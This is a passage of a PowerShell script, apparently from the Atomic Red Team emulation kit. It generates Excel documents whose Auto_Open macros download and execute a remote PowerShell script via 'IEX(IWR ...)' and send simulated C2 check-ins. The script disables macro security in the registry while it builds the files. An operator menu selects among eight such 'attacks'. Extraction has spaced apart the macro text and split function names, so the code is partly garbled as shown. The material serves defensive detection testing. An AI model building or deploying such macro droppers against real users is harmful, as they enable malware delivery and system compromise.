New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Shell-C2-GET {
<#
.SYNOPSIS
Standard Shell() macro execution plus a simulated HTTP GET check-in.
.DESCRIPTION
The macro's Auto_Open calls two module-level functions in order: Execute, which (as in Excel-Shell) calls Shell() with a
"cmd.exe /c powershell.exe IEX(IWR ...)" command line that downloads and runs chain_reaction_DragonsTail.ps1; and C2,
which creates a WinHttp.WinHttpRequest.5.1 object and sends a GET to the placeholder URL http://www.example.com with a
fixed "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" User-Agent, a form-urlencoded Content-type header and the
body "ART=AtomicRedTeam". Note that a body is passed to send() even though the verb is GET. The URL and User-Agent are
hard-coded in the here-string, so they are the same in every generated document.
Steps on the generating host: create a hidden Excel.Application COM instance; set AccessVBOM=1 and VBAWarnings=1 under
HKCU:\Software\Microsoft\Office\<version>\Excel\Security; add a standard module containing $Code; save to
$global:FullName as xlExcel8; release Excel; write both registry values back to 0.
Side effects: HKCU registry writes, a file at $global:FullName, and every running excel process is killed.
Reads $global:FullName; returns nothing.
NOTE(review): this copy of the file has whitespace inserted around operators, inside string literals and between every
character of the here-string, presumably from extraction; the comments describe the statements as intended.
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
E x e c u t e
C 2
E n d S u b
P u b l i c F u n c t i o n E x e c u t e ( ) A s V a r i a n t
C a l l S h e l l ( " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " , 1 )
E n d F u n c t i o n
P u b l i c F u n c t i o n C 2 ( ) A s V a r i a n t
S e t o b j H T T P = C r e a t e O b j e c t ( " W i n H t t p . W i n H t t p R e q u e s t . 5 . 1 " )
U R L = " h t t p : / / w w w . e x a m p l e . c o m "
o b j H T T P . O p e n " G E T " , U R L , F a l s e
o b j H T T P . s e t R e q u e s t H e a d e r " U s e r - A g e n t " , " M o z i l l a / 4 . 0 ( c o m p a t i b l e ; M S I E 6 . 0 ; W i n d o w s N T 5 . 0 ) "
o b j H T T P . s e t R e q u e s t H e a d e r " C o n t e n t - t y p e " , " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "
o b j H T T P . s e n d ( " A R T = A t o m i c R e d T e a m " )
E n d F u n c t i o n
"@
#Create excel document: hidden COM instance; Version is only used to build the per-version registry path.
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security for the current user (HKCU only). AccessVBOM=1 = "trust access to the VBA project object
# model" (required for VBComponents.Add below); VBAWarnings=1 = enable all macros. -Force overwrites existing values.
# NOTE(review): the previous values are never read, so the "restore" at the end of this function cannot put them back.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
# wdAlertsNone is a Word (WdAlertLevel) constant name, not an Excel one — presumably a leftover from the Word-based
# generator this script was adapted from; the $false assignment above is what suppresses prompts. Confirm.
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
# $Worksheet01 is assigned but never used.
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
# VBComponents.Add(1): 1 = vbext_ct_StdModule (a standard code module); $Code is inserted as its source text.
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document as Excel 97-2003 (.xls, xlExcel8). The interop assembly is loaded only so the enum name resolves.
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup: close, quit and release the COM object. `kill -name excel` then terminates EVERY excel process on the host,
# including any workbook the user had open, not only the instance created above.
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security: both values are written to 0, not to whatever was there before this function ran (0 is not
# one of the documented VBAWarnings levels — confirm how Excel treats it). There is no try/finally, so an error
# anywhere above (SaveAs, COM) leaves AccessVBOM=1 / VBAWarnings=1 in place on the generating host.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Shell-C2-POST {
<#
.SYNOPSIS
Standard Shell() macro execution plus a simulated HTTP POST check-in.
.DESCRIPTION
Identical to Excel-Shell-C2-GET except that the C2 function opens the WinHttp request with the POST verb. Auto_Open calls
Execute (Shell() with a "cmd.exe /c powershell.exe IEX(IWR ...)" command line that downloads and runs
chain_reaction_DragonsTail.ps1) and then C2, which sends "ART=AtomicRedTeam" as a form-urlencoded body to the placeholder
URL http://www.example.com. The User-Agent here is "Mozilla (compatible; MSIE 6.0; Windows NT 5.0)" — it lacks the "/4.0"
the GET variant sends, presumably unintentionally. URL and User-Agent are hard-coded in the here-string.
Steps on the generating host: create a hidden Excel.Application COM instance; set AccessVBOM=1 and VBAWarnings=1 under
HKCU:\Software\Microsoft\Office\<version>\Excel\Security; add a standard module containing $Code; save to
$global:FullName as xlExcel8; release Excel; write both registry values back to 0.
Side effects: HKCU registry writes, a file at $global:FullName, and every running excel process is killed.
Reads $global:FullName; returns nothing.
NOTE(review): this copy of the file has whitespace inserted around operators, inside string literals and between every
character of the here-string, presumably from extraction; the comments describe the statements as intended.
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
E x e c u t e
C 2
E n d S u b
P u b l i c F u n c t i o n E x e c u t e ( ) A s V a r i a n t
C a l l S h e l l ( " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " , 1 )
E n d F u n c t i o n
P u b l i c F u n c t i o n C 2 ( ) A s V a r i a n t
S e t o b j H T T P = C r e a t e O b j e c t ( " W i n H t t p . W i n H t t p R e q u e s t . 5 . 1 " )
U R L = " h t t p : / / w w w . e x a m p l e . c o m "
o b j H T T P . O p e n " P O S T " , U R L , F a l s e
o b j H T T P . s e t R e q u e s t H e a d e r " U s e r - A g e n t " , " M o z i l l a ( c o m p a t i b l e ; M S I E 6 . 0 ; W i n d o w s N T 5 . 0 ) "
o b j H T T P . s e t R e q u e s t H e a d e r " C o n t e n t - t y p e " , " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "
o b j H T T P . s e n d ( " A R T = A t o m i c R e d T e a m " )
E n d F u n c t i o n
"@
#Create excel document: hidden COM instance; Version is only used to build the per-version registry path.
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security for the current user (HKCU only). AccessVBOM=1 = "trust access to the VBA project object
# model" (required for VBComponents.Add below); VBAWarnings=1 = enable all macros. -Force overwrites existing values.
# NOTE(review): the previous values are never read, so the "restore" at the end of this function cannot put them back.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
# wdAlertsNone is a Word (WdAlertLevel) constant name, not an Excel one — presumably a leftover from the Word-based
# generator this script was adapted from; the $false assignment above is what suppresses prompts. Confirm.
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
# $Worksheet01 is assigned but never used.
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
# VBComponents.Add(1): 1 = vbext_ct_StdModule (a standard code module); $Code is inserted as its source text.
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document as Excel 97-2003 (.xls, xlExcel8). The interop assembly is loaded only so the enum name resolves.
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup: close, quit and release the COM object. `kill -name excel` then terminates EVERY excel process on the host,
# including any workbook the user had open, not only the instance created above.
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security: both values are written to 0, not to whatever was there before this function ran (0 is not
# one of the documented VBAWarnings levels — confirm how Excel treats it). There is no try/finally, so an error
# anywhere above (SaveAs, COM) leaves AccessVBOM=1 / VBAWarnings=1 in place on the generating host.
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
#Determine Attack: print the menu and re-prompt until the operator enters exactly one of "1".."8".
# (As written in this copy the comparisons are against " 1 " etc. with padding spaces — presumably an extraction
# artifact; the intended test is against the bare digit.) No other validation is done; the loop cannot exit otherwise.
Do {
Write-Host "
--------Select Attack---------
1. Chain Reaction Download and execute with Excel.
2. Chain Reaction Download and execute with Excel, wmiprvse
3. Chain Reaction Download and execute with Excel, wmiprvse benign
4. Chain Reaction Download and execute with Excel Shell
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
6. Chain Reaction Download and execute with Excel WshShell
7. Chain Reaction Download and execute with Excel and POST C2.
8. Chain Reaction Download and execute with Excel and GET C2.
------------------------------ "
$AttackNum = Read-Host -prompt " Select Attack Number & Press Enter "
} until ( $AttackNum -eq " 1 " -or $AttackNum -eq " 2 " -or $AttackNum -eq " 3 " -or $AttackNum -eq " 4 " -or $AttackNum -eq " 5 " -or $AttackNum -eq " 6 " -or $AttackNum -eq " 7 " -or $AttackNum -eq " 8 " )
#Initiate Attack Choice. Menu number -> function: 1 Excel-Com-Trampoline (ShellWindows), 2 Excel-Com-Wmiprvse-Trampoline,
# 3 Excel-Com-Wmiprvse-Benign-Trampoline, 4 Excel-Shell, 5 Excel-Com-ShellBrowserWindow, 6 Excel-Com-wshshell,
# 7 Excel-Shell-C2-POST, 8 Excel-Shell-C2-GET. Note that menu item 1 ("with Excel.") is the ShellWindows COM variant and
# item 4 ("Excel Shell") is the plain Shell() variant — the labels are easy to read the other way round.
# Every branch writes the workbook to the same $global:FullName set at the top of the script. There is no else branch;
# it is unreachable anyway because the loop above only exits on a valid number.
# NOTE(review): the calls below are split at the hyphens ("Excel-Com -Trampoline") in this copy of the file, which does
# not match the function names defined above; presumably extraction tokenization — as written they would try to invoke
# a command named Excel-Com / Excel-Shell with switch parameters. Confirm against upstream.
if ( $AttackNum -eq " 1 " ) {
Excel-Com -Trampoline
}
elseif ( $AttackNum -eq " 2 " ) {
Excel-Com -Wmiprvse -Trampoline
}
elseif ( $AttackNum -eq " 3 " ) {
Excel-Com -Wmiprvse -Benign -Trampoline
}
elseif ( $AttackNum -eq " 4 " ) {
Excel-Shell
}
elseif ( $AttackNum -eq " 5 " ) {
Excel-Com -ShellBrowserWindow
}
elseif ( $AttackNum -eq " 6 " ) {
Excel-Com -wshshell
}
elseif ( $AttackNum -eq " 7 " ) {
Excel-Shell -C2 -POST
}
elseif ( $AttackNum -eq " 8 " ) {
Excel-Shell -C2 -GET
}